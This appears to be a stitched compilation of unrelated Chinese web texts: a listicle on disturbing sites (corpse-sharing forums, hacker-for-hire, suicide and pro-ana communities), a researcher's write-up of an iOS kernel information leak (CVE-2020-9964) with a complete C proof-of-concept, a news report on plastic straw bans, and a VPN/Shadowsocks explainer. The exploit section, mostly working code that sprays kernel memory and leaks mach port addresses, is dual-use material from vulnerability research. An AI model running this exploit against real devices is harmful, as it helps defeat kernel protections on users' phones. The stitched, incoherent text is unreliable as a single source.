Guys在您单击之前听起来足够纯真。有人假设留言板共享由已故演员，模特和音乐家组成的媒体，这些人被认为活着时很有吸引力。如果花花公子在死后几个月能发行安娜·妮可·史密斯的致敬版，这真的很奇怪吗？但是，如果您仔细观察，您会发现内容中心围绕着有魅力的男人的实际尸体的照片和视频。子论坛包括“死亡图像”和“犯罪与死亡视频”，用户可以在其中共享尸体照片；“犯罪与死亡视频”用于上传令人讨厌的帅哥垂死视频。实际上，最不令人毛骨悚然的子论坛只共享电影和电视节目中死去的热门演员的片段。那里的内容告诉您很多有关本网站的性质。 哈克租车 如果您想对自己的在线安全感到偏执，请加入有关黑客的暗网论坛。您是否知道在网上租用黑客所需的精力很少？ 购买者可以在Rent-A-Hacker上请求不同级别的黑客服务。也许您需要黑客入侵某人的Facebook才能删除一些令人尴尬的照片。也许您需要有人被错误逮捕。无论哪种方式，Rent-A-Hacker都能满足您的要求。 自杀网站 不幸的是，随着Internet的不断发展，数据显示，自杀倾向论坛的最新历史不断增加。某些社区并没有阻止自杀，而是将自杀视为可以接受的个人选择，并且经常交流有关成功生活的技巧和窍门。与该列表中的许多站点不同，您也无需进入暗网即可访问此类站点。从Reddit论坛 到可通过基本Google搜索访问的在线社区，自杀亲密社区甚至在随意的Internet浏览中也变得越来越普遍。 亲安娜社区 “ pro-ana”是“ pro-anarexia”的缩写。尽管可能难以理解，但仍有相当一部分在线社区 将厌食症和一般饮食失调视为生活方式的选择，而不是心理健康问题。赞成假名的网站将厌食症视为那些偏爱较瘦的审美观念的人的有效选择。在此类论坛中，识别为“假名”或“偏见”（贪食症爱好者）的用户交换有关严格限制饮食，禁食的建议和技巧和其他饮食失调的习惯。显然，社区效率很高，张贴者遵循有关饮食和运动的“规则”。社区成员互相支持，以达到各种危险的低目标权重。甚至更伤心的是，许多张贴者伸出援手让“ ana penpals ”挨饿，这表明其中许多成员可能很孤独，这个社区为他们提供了人际交往的唯一来源。 / r / HotAbortionStories 除非您对干扰内容的容忍度很高，否则建议您不要花任何时间在HotAbortionStories subreddit上。虽然不清楚该论坛是真实的还是某种奇怪的插科打,但subreddit本质上为因堕胎而打开的人提供了在线飞地。因为显然那是一回事吗？海报链接到用户在其他子目录上分享的堕胎故事，他们声称这些故事引起了人们的注意。他们还分享了如何以及为什么放弃堕胎的想法。再次点击，后果自负，因为这确实令人不快。 死胎宝贝系列 该论坛只有通过暗网才能访问，不 辜负其令人心碎和令人恐惧的名字：母亲在这里分享死产婴儿的照片。这样做的目的尚不清楚，但考虑到 维多利亚时代的死亡照片 曾经是一回事，共享照片的做法对于悲伤的母亲可能是合法的宣泄。  交流群 QQ群号：979727860 点击链接加入群聊：https://jq.qq.com/?_wv=1027&k=FDmmUxxL ...

iOS 14现已向公众开放，并附带了iOS 14.0安全内容更新。您将看到的其中一个漏洞是CVE-2020-9964，这是IOSurfaceAccelerator中的一个漏洞，也是我的第一个信息泄漏:) 我（@ Muirey03）和MohamedGhannam（@ _simo36）都被发现了此漏洞。如果我发现有更多知道这一点的人，我将不会感到惊讶。 Apple将此错误的影响描述为“本地用户可能能够读取内核内存”，并在描述中将其称为“内存初始化问题”，那么该错误是什么？ IOSurfaceAcceleratorClient :: user_get_histogram IOSurfaceAcceleratorClient是AppleM2ScalerCSCDriver IOService的用户客户端，并且是可以从“应用程序沙箱”中打开的少数几个用户客户端之一。我们对该用户客户端上的一种特定外部方法 （方法9，IOSurfaceAcceleratorClient :: user_get_histogram）感兴趣。IOSurfaceAcceleratorClient使用旧版 IOUserClient :: getTargetAndMethodForIndex 作为其外部方法，这就是方法9的IOExternalMethod描述符的样子： { IOSurfaceAcceleratorClient::user_get_histogram, kIOUCStructIStructO, 0x8, 0x0} 从中我们可以看到user_get_histogram仅占用8个字节的输入数据，并且不返回任何内容作为输出数据，因此让我们看一下实现。这是我注释的伪代码： IOReturn IOSurfaceAcceleratorClient::user_get_histogram(IOSurfaceAcceleratorClient *this, void *input, uint64_t inputSize){ IOReturn result; if (this->calledFromKernel) { ... } else { IOMemoryDescriptor *memDesc = IOMemoryDescriptor::withAddressRange(*(mach_vm_address_t *)input, this->histogramSize, kIODirectionOutIn, this->task); if ( memDesc ) { ret = memDesc->prepare(kIODirectionNone); if (ret) { ... } else { ret = AppleM2ScalerCSCDriver::get_histogram(this->fOwner, this, memDesc); memDesc->complete(kIODirectionNone); } memDesc->release(); } else { ret = kIOReturnNoMemory; } } return ret;} 从中我们可以看到，结构输入的8个字节旨在用作用户空间指针， AppleM2ScalerCSCDriver :: get_histogram` 可对其进行读写。实际上，get_histogram调用到get_histogram_gated，如下所示： IOReturn AppleM2ScalerCSCDriver::get_histogram_gated(AppleM2ScalerCSCDriver *this, IOSurfaceAcceleratorClient *client, IOMemoryDescriptor *memDesc){ IOReturn result; if ( memDesc->writeBytes(0, client->histogramBuffer, client->histogramSize) == client->histogramSize ) result = kIOReturnSuccess; else result = kIOReturnIOError; return result;} 我们看到client-> histogramBuffer被写回到用户空间，所以现在的问题是，client-> histogramBuffer是什么？它在哪里初始化，在哪里填充？ IOSurfaceAcceleratorClient::histogramBuffer 这个问题的答案最终是 IOSurfaceAcceleratorClient :: initClient， 它看起来像这样： bool IOSurfaceAcceleratorClient::initClient(IOSurfaceAcceleratorClient *this, AppleM2ScalerCSCDriver *owner, int type, AppleM2ScalerCSCHal *hal){ ... if ( ... ) { ... if ( ... ) { size_t bufferSize = ...; this->histogramSize = bufferSize; this->histogramBuffer = (void *)IOMalloc(bufferSize); IOAsynchronousScheduler *scheduler = IOAsynchronousScheduler::ioAsynchronousScheduler(0); this->scheduler = scheduler; if ( scheduler ) return true; ... } else { ... } } else { ... } this->stopClient(); return false;} 这是可疑的。histogramBuffer已分配但未填充，并且IOMalloc不会将内存归零，从而使histogramBuffer完全未初始化。正是在这一点上，我尝试为我自己调用该方法，但没有人感到惊讶，发现自己在看很多0xdeadbeef，这是未初始化内存的典型标志。 “开发” 我们正在将未初始化的内存泄漏回用户空间，但是我们该怎么办？像这样的信息泄漏自身相对而言是无害的，但是在利用其他内存损坏问题时有时是必不可少的。进行漏洞利用的一个常见要求是找到马赫端口地址，因此这是我进行漏洞利用的目标，但值得一提的是，该漏洞也可以用来击败kASLR。 我为此漏洞利用选择的目标分配是mach消息脱机端口阵列。发送马赫消息时，可以选择将消息标记为“复杂”。这告诉内核，标头后面的不是原始数据，而是一个“主体”，后跟与消息一起发送的描述符。这些描述符之一是mach_msg_ool_ports_descriptor_t，这是 一组插入到接收任务中的离线端口权限。 内核通过创建一个缓冲区来处理这些OOL端口，该缓冲区包含一个在消息发送时指向数组中每个端口的指针，并在收到消息后释放该缓冲区（有关此代码，请参见ipc_kmsg_copyin_ool_ports_descriptor，如果您感兴趣，则为“非常复杂，太长了，无法在此处粘贴）。这对我们来说是完美的！我们可以使用它来触发任何大小的内核分配，其中包含我们要读取的确切数据（马赫端口指针），并且我们可以在任何时候完全确定地释放它。 高级漏洞利用流程 因此，我的漏洞利用计划如下所示： 发送一些消息，其OOL端口数组的大小与client-> histogramSize相同 通过接收消息释放这些阵列 打开一个IOSurfaceAcceleratorClient连接，分配histogramBuffer，它现在应该与这些空闲端口数组之一重叠 调用外部方法9，将端口指针读回到用户空间 利润 在我的设备上，client-> histogramSize为0x300，这意味着我的端口阵列的长度必须为96个端口。我选择发送0x80消息，但这是我凭空提出的一个完全任意的数字，不要过多看它。 漏洞利用 最终的利用如下： #include <stdlib.h>#include <assert.h>#include <stdio.h>#include <mach/mach.h>#include <IOKit/IOKitLib.h>#if 0AppleM2ScalerCSCDriver Infoleak:IOSurfaceAcceleratorClient::user_get_histogram takes a userspace pointer and writes histogram data back to that address.IOSurfaceAcceleratorClient::initClient allocates this histogram buffer, but does not zero the memory.When the external method IOSurfaceAcceleratorClient::user_get_histogram is called, this uninitialised memory is then sent back to userspace.This vulnerability is reachable from within the app sandbox on iOS.Below is a proof-of-concept exploit which utilises this vulnerability to leak the address of any mach port that the calling process holds a send-right to.Other kernel object addresses can be obtained using this vulnerability in similar ways.#endif #define ASSERT_KR(kr) do { \ if (kr != KERN_SUCCESS) { \ fprintf(stderr, "kr: %s (0x%x)\n", mach_error_string(kr), kr); \ exit(EXIT_FAILURE); \ } \} while(0) #define LEAK_SIZE 0x300#define SPRAY_COUNT 0x80 mach_port_t create_port(void){ mach_port_t p = MACH_PORT_NULL; mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &p); mach_port_insert_right(mach_task_self(), p, p, MACH_MSG_TYPE_MAKE_SEND); return p;} io_connect_t open_client(const char* serviceName, uint32_t type){ io_connect_t client = MACH_PORT_NULL; io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching(serviceName)); assert(service != MACH_PORT_NULL); IOServiceOpen(service, mach_task_self(), type, &client); assert(client != MACH_PORT_NULL); IOObjectRelease(service); return client;} void push_to_freelist(mach_port_t port){ uint32_t portCount = LEAK_SIZE / sizeof(void*); struct { mach_msg_header_t header; mach_msg_body_t body; mach_msg_ool_ports_descriptor_t ool_ports; } msg = {{0}}; mach_port_t* ports = (mach_port_t*)malloc(portCount * sizeof(mach_port_t)); for (uint32_t i = 0; i < portCount; i++) ports[i] = port; size_t msgSize = sizeof(msg); msg.header.msgh_bits = MACH_MSGH_BITS_SET(MACH_MSG_TYPE_MAKE_SEND, 0, 0, MACH_MSGH_BITS_COMPLEX); msg.header.msgh_size = msgSize; msg.header.msgh_id = 'OOLP'; msg.body.msgh_descriptor_count = 1; msg.ool_ports.type = MACH_MSG_OOL_PORTS_DESCRIPTOR; msg.ool_ports.address = (void*)ports; msg.ool_ports.count = portCount; msg.ool_ports.deallocate = false; msg.ool_ports.copy = MACH_MSG_PHYSICAL_COPY; msg.ool_ports.disposition = MACH_MSG_TYPE_MAKE_SEND; mach_port_t rcvPorts[SPRAY_COUNT]; for (uint32_t i = 0; i < SPRAY_COUNT; i++) { mach_port_t rcvPort = create_port(); rcvPorts[i] = rcvPort;    msg.header.msgh_remote_port = rcvPort; //trigger kernel allocation of port array: kern_return_t kr = mach_msg(&msg.header, MACH_SEND_MSG | MACH_MSG_OPTION_NONE, (mach_msg_size_t)msgSize, 0, MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL); ASSERT_KR(kr);  } for (uint32_t i = 1; i < SPRAY_COUNT; i++) mach_port_destroy(mach_task_self(), rcvPorts[i]); free((void*)ports);}//The actual vulnerability:void leak_bytes(void* buffer){ io_connect_t client = open_client("AppleM2ScalerCSCDriver", 0); kern_return_t kr = IOConnectCallStructMethod(client, 9, (uint64_t*)&buffer, 8, NULL, NULL); ASSERT_KR(kr); IOServiceClose(client);}uint64_t find_port_addr(mach_port_t port){  uint64_t* leak = (uint64_t*)malloc(LEAK_SIZE); printf("Preparing heap\n");  push_to_freelist(port); printf("Leaking 0x%zx bytes\n", (size_t)LEAK_SIZE);  leak_bytes(leak); uint64_t addr = leak[1]; free(leak); return addr;}int main(int argc, char* argv[], char* envp[]){ mach_port_t port = create_port(); uint64_t port_addr = find_port_addr(port); printf("Leaked port address: %p\n", (void*)port_addr); return 0;} 我发现此漏洞利用程序的成功率接近100％，几乎无法检测到任何故障，从而使漏洞利用程序可以继续运行直到成功为止。 注： 我被告知，此漏洞的可利用性受到iOS 14堆分离的影响。我对iOS 14中所做的更改了解不足以确认这一点，但是在查看将来未初始化的内存泄漏时，绝对需要考虑这一点。 ...

距离塑料吸管“禁令”红线只剩十几天 你做好准备了吗？ 根据国家发改委和生态环境部于今年初联合印发的《关于进一步加强塑料污染治理的意见》，到2020年底，全国范围餐饮行业禁止使用不可降解一次性塑料吸管。这一规定被业内称为“禁管令”。 7月，国家发展改革委等九部门印发《关于扎实推进塑料污染治理工作的通知》。再次提出，2020年底，全国范围餐饮行业禁止使用不可降解一次性塑料吸管。《通知》明确了禁止范围不包括牛奶、饮料等食品外包装上自带的塑料吸管。 全国部分餐饮店已更换 以纸吸管居多 记者在杭州东站餐饮区域随机走访了数家餐饮门店，发现不少店铺已见不到塑料吸管的身影，但也有很多店铺依然提供塑料吸管。 “我们店在4个多月前就不再提供塑料吸管，换成了自带饮嘴的杯盖。”候车室内一家连锁快餐店店员吴浩说，“也还有消费者索要吸管，我们就做好解释工作。” 记者在车站内数家餐饮店走访，注意到大部分消费者使用直饮杯盖或直接用杯子饮用，吸管相较以往已明显减少。 奶茶受到不少消费者青睐，奶茶店是吸管消耗大户。记者近日在北京一家连锁奶茶门店的自助吸管区看到，这里提供塑料和纸两种材质吸管供选择，边上有提示，建议大家减少塑料吸管的使用。 记者调查发现，一些连锁的大型餐饮企业已经开始行动起来，目前的替代产品以纸吸管居多，但多数餐饮店还在继续使用塑料吸管。 “纸吸管一咬就变形，放在热饮里一会儿就泡软了，喝起来有一股纸味儿，感觉特别别扭。”爱喝奶茶的小王告诉记者。 北京的杨阳曾用纸吸管喝带冰沙的饮料，结果搅拌时吸管差点散掉，“不得不一口气全喝完，店员提醒说时间长了吸管就软掉了”。 记者采访的不少消费者表示，不太清楚禁止使用塑料吸管的规定，但如果有好用的替代品，也可以接受。“支持禁用塑料吸管，但要有好的替代产品，纸吸管的使用体验太差了。”一些消费者表示。 替代产品价格是塑料吸管的3至5倍 据了解，目前，不可降解一次性塑料吸管主要替代产品包括聚乳酸(PLA)、纸等材质制成的可降解吸管，竹木、不锈钢等材质制成的可循环使用吸管。PLA使用可再生植物资源提取出的原料加工而成，是一种新型的生物降解材料。 通过对上下游生产企业和餐饮企业的走访，记者发现，尽管可降解或可循环使用的吸管成为下阶段行业市场的趋势，但相较传统一次性塑料吸管的低价优势，替代产品进入主流市场仍面临难题。 其中最主要的原因是替代产品性价比仍较低。据了解，1根塑料吸管约0.01元，1根纸吸管约0.03元，1根PLA吸管约0.05元。 吸管生产商浙江义乌市双童日用品有限公司董事长楼仲平说，“公司早在2005年前后就开始启动聚乳酸可降解吸管的研发，经历了寻找原料、改进性能等重重困难，最终面世的产品最初几年一直在市场遇冷。” “以快餐行业为例，吸管、餐具等用量巨大，全面替换餐具和吸管将大幅增加成本。”海南银达国际餐饮管理有限公司总经理陈龙华表示。 据记者调查，可降解产品成本居高不下的一个重要原因在于产业链配套尚不完善。浙江省发展改革委一级巡视员徐幸表示，由于替代产品目前尚处于产业发展前期阶段，产业规模还不是很大，现在在研发、设备等环节成本较高。 楼仲平认为，虽然政策调整对生产企业是一次新的发展机遇，但转型过程中，产业链发育尚不完善是企业普遍面临的尴尬处境。 能否顺利跟数百亿根塑料吸管“说再见”？ 国家统计局数据显示，2019年全国塑料制品累计产量8184万吨，其中塑料吸管近3万吨，约合460亿根。 面对政策变局，有些厂家已做好布局。如双童6个吸管生产车间仅保留一个生产塑料吸管，大量设备被淘汰，生产线已经进行了更新，如今可降解吸管已占到双童吸管业务的70%左右。 对于生产厂家来说，国内市场还处于一个试探的过程。但一组数据显示，态势正向积极的方向转变。自9月以来，双童吸管已接到价值1000多万元的可降解吸管订单。楼仲平预计，今年可降解、可循环产品在公司年销售额占比将再提高十个百分点。 对于消费者最为在意的体验感，一些业内人士表示，随着工艺的逐步提高，纸吸管在75至80摄氏度也不会软化，但由于纸吸管没有回弹性，对于喜欢咬吸管的消费者来说，使用体验确实会打折扣。而使用感更接近于塑料吸管的PLA可降解吸管推广的主要障碍还是在于高昂的成本。 “随着塑料污染治理工作的逐步推进，尤其全社会对这个工作的重视，相信人们将对环境友好型材料达成共识，市场需求量和生产规模会越来越大，替代产品的生产成本也会逐步降低。”徐幸说。...

1 VPN是什么? VPN，全称：Virtual Private Network，中文翻译：虛拟私人网络。 作用：提供安全可靠的通信渠道，一般而言企业使用较多。 延伸作用：科学上网。 说明：VPN的出现并不是为了“科学上网”，二是在公网上建立加密的通信渠道。例如，公司员工出差或者在寝室，想要登录公司内网邮箱怎么办?这时VPN就派上用场了，可以通过第三方连接工具进行远程连接，比如思科就有相应的工具。 2 何为SS? SS全称shadowsocks，一开始为个人独立开发并用作“科学上网”，后被大家所熟知和广泛使用。再后来，据说作者被请去“喝茶”，停止了该项目。 3 什么是55R? 55R全称shadowsocks-R。55R作者声称SS不够隐匿，容易被防火墙检测到，55R在改进了混淆和协议，更难被防火墙检测到。简单地说，55R是SS的改进版。 4 VPN与55R、SS的区别? SS和55R两者原理相同，都是基于socks5代理。客户端与服务端没有建立专有通道，客户端和实际要访问的服务端之间通过代理服务器进行通信，客户端发送请求和接受服务端返回的数据都要通过代理服务器。 55R目的是为了能让流量通过防火墙。 客户端请求服务端数据流程(55R)： (1)浏览器发送请求(基于socks5协议)， 通过55R客户端将sock5协议通过协议插件和混淆插件进行转换加密，使得来自客户端的流量和基于HTTP协议的流量无差别; (2)55R服务端(代理服务器)收到请求后，通过混淆插件、协议插件将数据解密并还原协议，最后转发到目标服务器。 服务端返回数据到客户端同理。 VPN与55R、SS的区别? 目的(作用)不同，VPN是为了保证通信的安全性、私密性，不是专门为“科学上网”制定的技术;而SS/55R则是为了转发客户端流量，绕过防火墙的检测，从而达到“科学上网”的真实意图，但是没有保证数据传输的安全性。 其实55R和SS区别不大，不必为了使用而使用，只要能达到目标，用哪一个都是可以的。 ...